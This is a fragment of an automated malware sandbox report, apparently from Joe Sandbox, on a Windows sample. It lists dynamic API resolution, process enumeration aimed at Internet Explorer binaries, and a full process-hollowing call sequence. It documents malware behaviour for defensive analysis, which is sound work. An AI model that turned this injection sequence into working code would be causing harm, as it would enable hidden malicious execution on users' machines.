41d125 47220 41d15d 47218->47220 47226 402730 11 API calls 47218->47226 47220->47204 47221 41d144 47227 402712 11 API calls std::_Deallocate 47221->47227 47224->47216 47225->47218 47226->47221 47227->47220 47228->46885 47229->46890 47230->46888 47233 4032aa 47232->47233 47234 4028e8 28 API calls 47233->47234 47235 4032c9 47233->47235 47234->47235 47235->46901 47237 4051fb 47236->47237 47246 405274 47237->47246 47239 405208 47239->46904 47241 402061 47240->47241 47242 4023ce 11 API calls 47241->47242 47243 40207b 47242->47243 47251 40267a 47243->47251 47247 405282 47246->47247 47250 4028a4 22 API calls 47247->47250 47252 40268b 47251->47252 47253 4023ce 11 API calls 47252->47253 47254 40208d 47253->47254 47254->46907 47255->46915 47256->46920 47259 41b362 47258->47259 47260 41c055 GetCurrentProcess 47258->47260 47261 4135e1 RegOpenKeyExA 47259->47261 47260->47259 47262 413639 47261->47262 47263 41360f RegQueryValueExA RegCloseKey 47261->47263 47264 402093 28 API calls 47262->47264 47263->47262 47265 41364e 47264->47265 47265->46934 47266->46942 47268 40b947 47267->47268 47273 402252 47268->47273 47270 40b952 47277 40b967 47270->47277 47272 40b961 47272->46953 47274 4022ac 47273->47274 47275 40225c 47273->47275 47274->47270 47275->47274 47284 402779 11 API calls std::_Deallocate 47275->47284 47278 40b9a1 47277->47278 47279 40b973 47277->47279 47296 4028a4 22 API calls 47278->47296 47285 4027e6 47279->47285 47283 40b97d 47283->47272 47284->47274 47286 4027ef 47285->47286 47287 402851 47286->47287 47288 4027f9 47286->47288 47298 4028a4 22 API calls 47287->47298 47291 402802 47288->47291 47292 402815 47288->47292 47297 402aea 28 API calls __EH_prolog 47291->47297 47293 402813 47292->47293 47295 402252 11 API calls 47292->47295 47293->47283 47295->47293 47297->47293 47299->46956 47300->46956 47302 401f8e 47301->47302 47303 402252 11 API calls 47302->47303 47304 401f99 CreateToolhelp32Snapshot Process32FirstW 47303->47304 47304->46983 47306 404186 47305->47306 47307 402252 11 API calls 47306->47307 47308 404191 47307->47308 47361 4041bc 47308->47361 47312 41c292 OpenProcess 47311->47312 47313 41c2ac K32GetProcessImageFileNameW 47311->47313 47312->47313 47314 41c2a5 47312->47314 47315 41c2c4 CloseHandle 47313->47315 47316 41c2cc CloseHandle 47313->47316 47318 40417e 28 API calls 47314->47318 47315->47314 47373 41c0ac lstrlenW 47316->47373 47319 40f5d8 47318->47319 47319->47008 47321 413656 31 API calls 47320->47321 47322 41b737 47321->47322 47390 445825 37 API calls 2 library calls 47322->47390 47324 41b746 47391 409049 28 API calls 47324->47391 47326 41b763 47327 401f13 28 API calls 47326->47327 47328 41b76b 47327->47328 47329 401f09 11 API calls 47328->47329 47330 41b773 47329->47330 47392 409097 28 API calls 47330->47392 47332 41b77e 47393 41bdd3 28 API calls 47332->47393 47334 41b787 47335 401f13 28 API calls 47334->47335 47336 41b792 47335->47336 47337 401f09 11 API calls 47336->47337 47338 41b79a 47337->47338 47339 41c048 GetCurrentProcess 47338->47339 47341 41b7d5 _wcslen 47339->47341 47340 40f672 47340->46984 47341->47340 47394 41cfd5 28 API calls 47341->47394 47344 41c540 GetFileSize 47343->47344 47345 41c53c 47343->47345 47395 40244e 47344->47395 47345->47004 47347 41c554 47348 41c566 ReadFile 47347->47348 47349 41c573 47348->47349 47350 41c575 CloseHandle 47348->47350 47349->47350 47350->47345 47400 41812a 47351->47400 47355 4138f4 47354->47355 47356 4138ca RegSetValueExA RegCloseKey 47354->47356 47355->47017 47356->47355 47357->47032 47358->47037 47359->47022 47360->47044 47362 4041c8 47361->47362 47365 4041d9 47362->47365 47364 40419c 47364->47001 47366 4041e9 47365->47366 47367 404206 47366->47367 47368 4041ef 47366->47368 47369 4027e6 28 API calls 47367->47369 47372 404267 28 API calls 47368->47372 47371 404204 47369->47371 47371->47364 47372->47371 47374 41c0d1 _memcmp 47373->47374 47379 41c108 ctype 47373->47379 47377 41c0f1 lstrlenW 47374->47377 47374->47379 47375 41c126 FindFirstVolumeW 47376 41c146 GetLastError 47375->47376 47380 41c153 _wcslen 47375->47380 47378 41c1f9 47376->47378 47377->47374 47377->47379 47378->47314 47379->47375 47381 41c1e3 47380->47381 47383 41c174 QueryDosDeviceW 47380->47383 47382 41c1e8 FindVolumeClose 47381->47382 47382->47378 47384 41c261 GetLastError 47383->47384 47385 41c19c lstrcmpW 47383->47385 47384->47382 47386 41c213 GetVolumePathNamesForVolumeNameW 47385->47386 47387 41c1af FindNextVolumeW 47385->47387 47386->47384 47389 41c23b lstrcatW lstrcpyW 47386->47389 47387->47380 47388 41c204 GetLastError 47387->47388 47388->47381 47388->47382 47389->47382 47390->47324 47391->47326 47392->47332 47393->47334 47394->47340 47396 402456 47395->47396 47397 402460 47396->47397 47399 402a51 28 API calls 47396->47399 47397->47347 47399->47397 47401 418157 8 API calls 47400->47401 47402 4181c4 ___scrt_fastfail 47401->47402 47420 41847b CloseHandle CloseHandle 47401->47420 47403 41822a CreateProcessW 47402->47403 47402->47420 47404 418260 VirtualAlloc Wow64GetThreadContext 47403->47404 47405 4184b5 GetLastError 47403->47405 47406 41847f VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 47404->47406 47407 41828e ReadProcessMemory 47404->47407 47405->47420 47406->47420 47407->47406 47408 4182b4 NtCreateSection 47407->47408 47408->47406 47409 4182dc 47408->47409 47410 4182eb NtUnmapViewOfSection 47409->47410 47411 4182fc NtMapViewOfSection 47409->47411 47410->47411 47412 418320 VirtualFree NtClose TerminateProcess 47411->47412 47413 418368 GetCurrentProcess NtMapViewOfSection 47411->47413 47412->47401 47414 418363 47412->47414 47413->47406 47415 418395 ctype 47413->47415 47414->47420 47416 418431 WriteProcessMemory 47415->47416 47417 418454 Wow64SetThreadContext 47415->47417 47416->47406 47418 418450 47416->47418 47417->47406 47419 41846d ResumeThread 47417->47419 47418->47417 47419->47406 47419->47420 47420->47010 47422 4024f9 47421->47422 47423 40250a 28 API calls 47422->47423 47424 4020b1 47423->47424 47424->46678 47425->47085 47436 412829 61 API calls 47429->47436 47438 443248 CallUnexpected 47437->47438 47439 443260 47438->47439 47440 443396 _Atexit GetModuleHandleW 47438->47440 47459 445909 EnterCriticalSection 47439->47459 47442 443254 47440->47442 47442->47439 47471 4433da GetModuleHandleExW 47442->47471 47446 443268 47449 4432dd 47446->47449 47456 443306 47446->47456 47479 443ff0 20 API calls _Atexit 47446->47479 47447 443323 47463 443355 47447->47463 47448 44334f 47482 4577a9 5 API calls CatchGuardHandler 47448->47482 47450 4432f5 47449->47450 47480 444276 5 API calls CatchGuardHandler 47449->47480 47481 444276 5 API calls CatchGuardHandler 47450->47481 47460 443346 47456->47460 47459->47446 47483 445951 LeaveCriticalSection 47460->47483 47462 44331f 47462->47447 47462->47448 47484 448d49 47463->47484 47466 443383 47469 4433da _Atexit 8 API calls 47466->47469 47467 443363 GetPEB 47467->47466 47468 443373 GetCurrentProcess TerminateProcess 47467->47468 47468->47466 47470 44338b ExitProcess 47469->47470 47472 443404 GetProcAddress 47471->47472 47473 443427 47471->47473 47476 443419 47472->47476 47474 443436 47473->47474 47475 44342d FreeLibrary 47473->47475 47477 43502b CatchGuardHandler 5 API calls 47474->47477 47475->47474 47476->47473 47478 443440 47477->47478 47478->47439 47479->47449 47480->47450 47481->47456 47483->47462 47485 448d64 47484->47485 47486 448d6e 47484->47486 47488 43502b CatchGuardHandler 5 API calls 47485->47488 47490 44854a 47486->47490 47489 44335f 47488->47489 47489->47466 47489->47467 47491 44857a 47490->47491 47494 448576 47490->47494 47491->47485 47492 44859a 47492->47491 47495 4485a6 GetProcAddress 47492->47495 47494->47491 47494->47492 47497 4485e6 47494->47497 47496 4485b6 __crt_fast_encode_pointer 47495->47496 47496->47491 47498 448607 LoadLibraryExW 47497->47498 47499 4485fc 47497->47499 47500 448624 GetLastError 47498->47500 47503 44863c 47498->47503 47499->47494 47501 44862f LoadLibraryExW 47500->47501 47500->47503 47501->47503 47502 448653 FreeLibrary 47502->47499 47503->47499 47503->47502 47504 448319 GetLastError 47505 448332 47504->47505 47506 448338 47504->47506 47530 44883c 11 API calls 2 library calls 47505->47530 47510 44838f SetLastError 47506->47510 47523 445b74 47506->47523 47513 448398 47510->47513 47511 448352 47531 446802 47511->47531 47514 448367 47514->47511 47517 44836e 47514->47517 47516 448358 47518 448386 SetLastError 47516->47518 47538 448107 20 API calls _Atexit 47517->47538 47518->47513 47520 448379 47521 446802 _free 17 API calls 47520->47521 47522 44837f 47521->47522 47522->47510 47522->47518 47528 445b81 ___crtLCMapStringA 47523->47528 47524 445bc1 47540 44062d 20 API calls _Atexit 47524->47540 47525 445bac RtlAllocateHeap 47526 445bbf 47525->47526 47525->47528 47526->47511 47537 448892 11 API calls 2 library calls 47526->47537 47528->47524 47528->47525 47539 443001 7 API calls 2 library calls 47528->47539 47530->47506 47532 44680d RtlFreeHeap 47531->47532 47533 446836 __dosmaperr 47531->47533 47532->47533 47534 446822 47532->47534 47533->47516 47541 44062d 20 API calls _Atexit 47534->47541 47536 446828 GetLastError 47536->47533 47537->47514 47538->47520 47539->47528 47540->47526 47541->47536 47542 40165e 47543 401666 47542->47543 47544 401669 47542->47544 47545 4016a8 47544->47545 47547 401696 47544->47547 47546 43455e new 22 API calls 47545->47546 47548 40169c 47546->47548 47549 43455e new 22 API calls 47547->47549 47549->47548

                                                                                                                                                Executed Functions

                                                                                                                                                Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                                                                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                • API String ID: 4236061018-3687161714
                                                                                                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                                                                                                Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 452 4181d1-4181d8 450->452 453 4184bd-4184c7 451->453 452->451 454 4181de-4181e0 452->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc Wow64GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b Wow64SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 488 418450 484->488 485->464 489 41846d-418479 ResumeThread 485->489 488->485 489->464 493 41847b-41847d 489->493 491->478 493->453
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 004182A6
                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                                                                • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00418446
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 00418470
                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                                • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                • API String ID: 3150337530-3035715614
                                                                                                                                                • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                                                                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                                                • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                                                                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                                                                                Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 542 40f4af-40f4e2 GetModuleFileNameW call 407801 545 40f4e8-40f516 call 401f86 CreateToolhelp32Snapshot Process32FirstW 542->545 546 40f669-40f66d call 41b71b 542->546 551 40f586-40f597 Process32NextW 545->551 550 40f672-40f69d call 401f13 call 401f09 call 411190 546->550 570 40f6a3-40f6f3 CloseHandle call 4020df call 401f04 call 41c516 call 401fab call 401f04 call 4185a3 550->570 571 40f7c9-40f7e1 call 401f09 550->571 553 40f518-40f57b call 40417e call 402305 call 4022ca call 402305 call 409c16 call 40ba07 551->553 554 40f59d-40f5b8 CloseHandle call 407801 551->554 590 40f5c8-40f5d3 call 41c26e 553->590 591 40f57d-40f581 call 401f09 553->591 563 40f664 call 401f09 554->563 564 40f5be-40f5c3 call 401f09 554->564 563->546 564->570 602 40f7a2-40f7b5 call 401fab call 4138b2 570->602 603 40f6f9-40f746 call 40417e call 401fab call 409196 call 401f04 call 4185a3 call 401f09 570->603 597 40f5d8-40f5fd call 401f13 call 401f09 call 407801 590->597 591->551 616 40f616-40f626 call 407801 597->616 617 40f5ff-40f611 call 401f09 * 2 597->617 614 40f7ba-40f7bf 602->614 644 40f748-40f787 call 401fab call 409196 call 401f04 call 4185a3 call 401f09 603->644 645 40f799-40f79d call 401f09 603->645 618 40f7c0-40f7c4 call 401fd8 614->618 628 40f657-40f660 call 401f09 616->628 629 40f628-40f636 call 41c076 616->629 617->571 618->571 628->563 629->628 638 40f638-40f652 call 40b9a7 call 401f09 629->638 638->554 644->645 658 40f789-40f797 call 40d0a4 call 401f09 644->658 645->602 658->618
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                • API String ID: 3756808967-1743721670
                                                                                                                                                • Opcode ID: da443440b28f1eae5c7b0155bbdce7f5ca32cb0f0e1642a96bb257d71490179a
                                                                                                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                                                • Opcode Fuzzy Hash: da443440b28f1eae5c7b0155bbdce7f5ca32cb0f0e1642a96bb257d71490179a
                                                                                                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                                Function 00443355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 775 443355-443361 call 448d49 778 443383-44338f call 4433da ExitProcess 775->778 779 443363-443371 GetPEB 775->779 779->778 780 443373-44337d GetCurrentProcess TerminateProcess 779->780 780->778
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 1703294689-263838557
                                                                                                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                                Function 0040EA00 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
